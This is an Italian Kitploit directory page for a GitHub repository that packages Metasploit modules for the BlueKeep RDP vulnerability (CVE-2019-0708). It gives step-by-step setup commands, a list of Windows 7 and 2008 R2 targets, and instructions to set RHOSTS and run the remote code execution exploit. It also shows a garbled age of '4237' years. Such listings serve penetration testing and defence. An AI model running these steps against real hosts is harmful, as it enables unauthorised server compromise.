Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-0708 — CVE-2019-0708 con Metasploit-Framework Exploit | Kitploit
Strumenti/GitHubGitHub/frostsaberx/cve-2019-0708
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubfrostsaberx/cve-2019-0708

CVE-2019-0708

CVE-2019-0708 con Metasploit-Framework Exploit

Vedi Repository
4237 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-0708

CVE-2019-0708 con Metasploit-Framework

La vulnerabilità CVE-2019-0708 aggira l'autenticazione sfruttando i controlli di autenticazione dell'utente, permettendo a un attaccante di connettersi tramite il protocollo RDP senza alcuna interazione e di inviare codice malevolo per eseguire comandi sul server. Se sfruttata, può portare al compromesso del server, all'infezione da virus e a una diffusione su larga scala simile a quella di WannaCry e EternalBlue.

Intorno all'1:00 del 7 settembre 2019, Metasploit ha aggiornato l'exploit.

Utilizzo:

Scarica lo strumento

0x01 Configurazione dell'ambiente

Esecuzione nel terminale

apt install metasploit-framework

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

0x02 Metodo di operazione

1. Utilizza il modulo windows/rdp/cve_2019_0708_bluekeep_rce

2. Imposta RHOSTS e target (se la macchina target utilizza VMWare, imposta target a 3)

0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

3. Esegui l'exploit